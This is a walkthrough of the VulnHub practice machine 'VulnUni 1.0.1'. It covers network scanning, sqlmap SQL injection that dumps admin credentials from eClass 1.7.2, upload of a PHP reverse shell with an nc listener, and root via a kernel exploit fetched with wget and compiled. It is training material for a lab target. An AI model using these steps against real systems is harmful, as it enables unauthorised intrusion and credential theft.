VulnUni: 1.0.1 | walkthrough |writeup| vulnhub
DESCRIPTION:
__ __ _ _ _ _
\ \ / / | | | | | | (_)
\ \ / / _| |_ __ | | | |_ __ _
\ \/ / | | | | '_ \ | | | | '_ \| |
\ /| |_| | | | | | | |__| | | | | |
\/ \__,_|_|_| |_| \____/|_| |_|_|
Welcome to "Vuln Uni"!
This boot2root machine is realistic without any CTF elements and pretty straight forward.
Goal: Hack your University and get root access to the server.
To successfully complete the challenge you need to get user and root flags.
Difficulty: Easy / Beginner Level
https://emaragkos.gr/vulnhub-writeups/vulnhub-boot2root-machine-vulnuni/
Need hints? Twitter @emaragkos
DHCP is enabled
Your feedback is really valuable for me!
Was there something that you didn’t like about this VM?
Please let me know so that I can make more interesting challenges in the future.
Good luck and have fun :)
## Changelog v1.0.1 - 2020-03-20 v1.0 - 2020/03-19
DOWNLOAD LINK: https://download.vulnhub.com/vulnuni/vulnuni1.0.1.ova
lets find the ip address for machine with the tool named netdiscover
netdiscover -i vboxnet0
- -i device: your network device
- for the name of network use command ifconfig
So now lets Start with nmap scan
nmap -v -sCV -A -O -p- 192.168.56.103
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: VulnUni — We train the top Information Security Professionals
So here only one port is open, Lets Enumerate…
@port 80:
lets visit full site manually and check the source code also,
found a comment in the source code of page courses saying to disable a page “vulnuni-eclass-platform.html” till the new version is installed.
lets visit the commented page manually
found a redirection to the login page
page not found due to the a-name record, as it redirects to the “vulnuni.local/vulnuni-eclass/index.php” ,
lets edit our hosts file
vim /etc/hosts
lets try again
here it is, I tried some default username and password like admin:admin, user:password but didn’t worked.
found the eclass current version installed, lets google for the vulnerabilities in eclass version 1.7.2 .
got vulnerability of Error based sqli on a particular parameter
lets use these parameters , as we don’t have any account so we will go for time-based blind injection as said in above exploit.
sqlmap -u “http://vulnuni.local/vulnuni-eclass/index.php" — dump -D eclass -T user -C username,password — form — crawl=2
got login with admin privilages, with the extracted credential from mysql
admin : ilikecats89
lets follow the another part of the same exploit to take reverse shell.
lets follow and navigate to /modules/course_info/restore_course.php
lets compress our shell in a zip file
zip bla.zip php-reverse-shell.php
upload the zip file and lets start a nc listener
nc -lvp 4455
now we just have to call the given location in the browser “/courses/tmpUnzipping/php-reverse-shell.php” and will get shell.
got shell as www-data and converted it into a stty shell.
Privilage Escalation:
didn’t get any thing intresting in the box else then the kernel version that is exploitable, I have downloaded the exploit which I found at github.
get it downloaded to the victims machine with the help of a python server
python -m SimpleHTTPServer 1234
wget http://192.168.56.1:1234/exploit.c
lets compile the exploit and run the exploit
gcc exploit.c -o exploit -Wall -ldl -lpthread
chmod +x exploit
./exploit
got ROOT
DONE.